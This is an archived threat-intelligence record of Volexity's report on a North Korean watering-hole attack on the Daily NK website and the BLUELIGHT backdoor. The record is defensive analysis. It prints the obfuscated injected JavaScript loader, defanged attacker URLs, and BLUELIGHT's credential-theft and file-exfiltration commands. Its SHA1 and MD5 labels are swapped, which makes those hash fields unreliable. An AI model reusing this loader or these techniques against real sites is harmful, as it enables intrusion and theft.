{
	"id": "3f234124-2fc7-4c29-b65e-6c457f7a18b1",
	"created_at": "2026-04-06T00:12:31.374338Z",
	"updated_at": "2026-04-10T03:38:06.300241Z",
	"deleted_at": null,
	"sha1_hash": "7a0ebf5e8bf22f17afe46eea852b54cd9ef989ee",
	"title": "North Korean APT InkySquid Infects Victims Using Browser Exploits",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 823582,
	"plain_text": "North Korean APT InkySquid Infects Victims Using Browser Exploits\r\nBy mindgrub\r\nPublished: 2021-08-17 · Archived: 2026-04-02 10:48:47 UTC\r\nVolexity recently investigated a strategic web compromise (SWC) of the website of the Daily NK (www.dailynk[.]com), a\r\nSouth Korean online newspaper that focuses on issues relating to North Korea. Malicious code on the Daily NK website was\r\nobserved from at least late March 2021 until early June 2021.\r\nThis post provides details on the different exploits used in the SWC, as well as the payload used, which Volexity calls\r\nBLUELIGHT. Volexity attributes the activity described in this post to a threat actor Volexity refers to as InkySquid, which\r\nbroadly corresponds to activity known publicly under the monikers ScarCruft and APT37.\r\nSWC Activity\r\nIn April 2021, through its network security monitoring on a customer network, Volexity identified suspicious code being\r\nloaded via www.dailynk[.]com to malicious subdomains of jquery[.]services. Examples of URLs observed loading\r\nmalicious code include the following:\r\nhxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1\r\nhxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2\r\nThese URLs lead to legitimate files used as part of the normal function of the Daily NK website; however, their contents\r\nwere modified by the attacker to include code redirecting users to load malicious JavaScript from the attacker-owned\r\ndomain jquery[.]services. The attacker-included code was only added for short periods of time and was swiftly removed,\r\nmaking identification of this activity difficult as the malicious content was not always available.\r\nCVE-2020-1380\r\nThe first time Volexity was able to identify malicious code being returned, the attacker was observed using CVE-2020-1380,\r\nan exploit for Internet Explorer. 
The attacker added a single line of code to the following legitimate file on Daily NK:\r\nhxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1\r\nThe line of obfuscated code added to DailyNK was as follows:\r\nfunction vgrai(){var\r\ne=document.createElement(“script”);e.src=fecet(“w6625I\u003e\u003e7x=y37t4;=5t48xrt5\u003e4t52105x8t\u003ct:6t0s=/x0=y5”,15),document.head\u0026\u0026document.head.a\r\nvdgie(){const e=window.navigator.userAgent,t=e.indexOf(“rv:11.0 “),i=e.indexOf(“Trident/”);return\r\nt\u003e0||i\u003e0}vdgie()\u0026\u0026vgrai();\r\nThe effect of this is that if a user visited Daily NK using Internet Explorer, then a page would load an additional JavaScript\r\nfile from the following URL:\r\nhxxps://ui.jquery[.]services/responsive-extend.min.js\r\nhttps://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/\r\nPage 1 of 5\n\nWhen requested, with the correct Internet Explorer User-Agent, this host would serve additional obfuscated JavaScript code.\r\nAs with the initial redirect, the attacker chose to bury their malicious code amongst legitimate code. In this particular case,\r\nthe attacker used the “bPopUp” JavaScript library alongside their own code. This decision has two effects:\r\n1. Anyone manually analyzing the JavaScript may dismiss it as legitimate, since the majority of the included code is\r\nbenign.\r\n2. Automated solutions used to identify malicious JavaScript may misidentify the code as benign, since large sections\r\nmatch known legitimate library content and use code patterns seen in benign JavaScript.\r\nOne interesting aspect of the exploit code the attacker includes is that many of the strings are obfuscated within variables\r\ndesigned to look like legitimate SVG content. An example of the attacker hiding these strings is given in Figure 1:\r\nFigure 1. 
Obfuscated strings within the falsified SVG variable\r\nIn order to decrypt the strings, the following steps are performed:\r\n1. Split the data contained within the “d” attribute of the “path” variable via the “M43.2” string.\r\n2. Take each element in the split data and split once again on space characters, resulting in a list of numbers.\r\n3. Convert each resulting number to an integer.\r\n4. If this integer is greater than 30, subtract 17 and append it to the resulting string. If the integer is 30 or less, discard it.\r\nA Python script to decode these SVG variables is provided on Volexity’s GitHub page here.\r\nIn total, three fake SVG objects were used. Once the strings from these objects are substituted into the remaining JavaScript,\r\nidentifying the exploit becomes easier. A key segment of the resulting code is given in Figure 2:\r\nFigure 2. Implementation of CVE-2020-1380\r\nThis code corresponds to publicly available proof-of-concept (PoC) code for CVE-2020-1380 that has been well\r\ndocumented by TrendMicro.\r\nFollowing successful exploitation, the JavaScript decrypts a final SVG variable using the same technique described\r\npreviously. The resulting blob contains a hex-encoded representation of a Cobalt Strike stager, which is decoded and\r\nexecuted. In this case, the URLs from where it expected to download additional shellcode were as follows:\r\nhxxps://ui.jquery[.]services/swipeout.min.js\r\nhxxps://ui.jquery[.]services/swipeout.min.css\r\nhxxps://ui.jquery[.]services/slider.min.css\r\nCVE-2021-26411\r\nOn another occasion, CVE-2021-26411 was used, which is another exploit targeting Internet Explorer and legacy versions of\r\nMicrosoft Edge. The redirect code was set up in the same way as CVE-2020-1380, the only difference being the exploit\r\ncode used. The key part of the exploit code used is given in Figures 3 and 4. 
It was likely a direct implementation of the PoC\r\ncode posted here by Korean security company Enki.\r\nFigure 3. Key exploit code used by the attackers\r\nFigure 4. PoC code released on the Enki security blog\r\nAs with the CVE-2020-1380 example, the attacker made use of encoded content stored in SVG tags to store both key strings\r\nand their initial payload. The initial command-and-control (C2) URLs were the same as those observed in the CVE-2020-1380\r\ncase.\r\nBLUELIGHT\r\nOn another occasion, the attacker used a different subdomain of jquery[.]services to host a new and novel malware family.\r\nThe file was hosted at the following location:\r\nhxxps://storage.jquery[.]services/log/history\r\nThe “history” file was an XOR-encoded (0xCF) copy of a custom malware family that both the malware developer and\r\nVolexity refer to as BLUELIGHT. The moniker is derived from the PDB string observed in the malware:\r\nE:\\Development\\BACKDOOR\\ncov\\Release\\bluelight.pdb\r\nIt is likely that BLUELIGHT is used as a secondary payload following successful delivery of Cobalt Strike, which was used\r\nas an initial payload in both exploitation cases highlighted earlier in this report.\r\nThe file analyzed for this report had the following details:\r\nFilename history\r\nSHA1 9b86888a83dd0dd1c3a0929f1ea53b82\r\nMD5 558ce5e8c0b1b0a76b88db087f0c92f7a62716fe\r\nSHA256 5c430e2770b59cceba1f1587b34e686d586d2c8ba1908bb5d066a616466d2cc6\r\nNotes Shellcode with embedded PE.\r\nThe BLUELIGHT malware family uses different cloud providers to facilitate C2. This specific sample leveraged the\r\nMicrosoft Graph API for its C2 operations. Upon start-up, BLUELIGHT performs an OAuth2 token authentication using\r\nhard-coded parameters. 
Once the client is authenticated, BLUELIGHT creates a new subdirectory in the OneDrive appfolder\r\nand populates it with several subdirectories used by the C2 protocol. The following subdirectory names were used:\r\nlogo\r\nnormal\r\nbackground\r\ntheme\r\nround\r\nOnce the folder and subdirectories are set up, reconnaissance data is gathered containing the following information,\r\nformatted as a JSON object:\r\nUsername\r\nComputer name\r\nOS version\r\nWeb IP\r\nLocal IP of default interface\r\nLocalTime\r\nWhether the implant binary is 32 or 64 bit\r\nProcess SID authority level\r\nProcess filename\r\nList of AV products installed\r\nWhether the infected machine has VM tools running\r\nThe data is XOR encoded into a binary blob and uploaded. All further reconnaissance and command response data is\r\nsimilarly encoded. This version of the implant used the “.jpg” extension for nearly all files uploaded regardless of their\r\ncontent, with different subdirectories and base filenames indicating different types of command data. The reconnaissance\r\ndata, for instance, is uploaded to the “logo/title.jpg” path.\r\nThe main C2 loop starts after the initial upload of the reconnaissance data, iterating approximately once every 30 seconds.\r\nFor the first five minutes, each iteration will capture a screenshot of the display and upload it to the “normal” subdirectory\r\nwith an encoded timestamp as the filename. After the first five minutes, the screenshot uploads once every five minutes.\r\nWith every iteration, the client will also query for new commands by enumerating the children of the “background”\r\nsubdirectory. The name of the file indicates the command to perform, with the contents of the file providing further\r\ncommand-specific information. 
The following commands are supported:\r\nExecute downloaded shellcode.\r\nDownload and launch an executable, then upload program output.\r\nHarvest cookies and a password database for supported browsers.\r\n— Supports: Win7 IE, Win10 IE, Edge, Chrome, and Naver Whale\r\nRecursively search a path and upload file metadata (timestamps, size, and full path).\r\nSpawn a thread to recursively search a path and upload files as a ZIP archive.\r\nTerminate the file upload thread.\r\nUninstall the implant.\r\nCommand files are deleted after being processed. Result files for most commands are uploaded to the “round” directory;\r\nhowever, the ZIP upload uses the “theme” subdirectory.\r\nConclusion\r\nWhile SWCs are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers. The use of\r\nrecently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience. Attackers will\r\nstill have some success, however, and have a good chance of avoiding detection based on the following attributes of their\r\nattack:\r\nClever disguise of exploit code amongst legitimate code, making it harder to identify\r\nOnly allowing exploitable user-agents access to the exploit code, making it difficult to identify at scale (such as\r\nthrough automated scanning of websites)\r\nUse of innovative custom malware, such as BLUELIGHT, after successful exploitation using C2 mechanisms which\r\nare unlikely to be detected by many solutions\r\nHow is this activity attributed to InkySquid (aka ScarCruft, APT37)? 
This will be explained further in a follow-up post, so\r\nstay tuned!\r\nIoCs \u0026 Signatures\r\nRelated IoCs and signatures to this post are available on Volexity’s GitHub page here.\r\nSource: https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
	],
	"report_names": [
		"north-korean-apt-inkysquid-infects-victims-using-browser-exploits"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434351,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7a0ebf5e8bf22f17afe46eea852b54cd9ef989ee.pdf",
		"text": "https://archive.orkl.eu/7a0ebf5e8bf22f17afe46eea852b54cd9ef989ee.txt",
		"img": "https://archive.orkl.eu/7a0ebf5e8bf22f17afe46eea852b54cd9ef989ee.jpg"
	}
}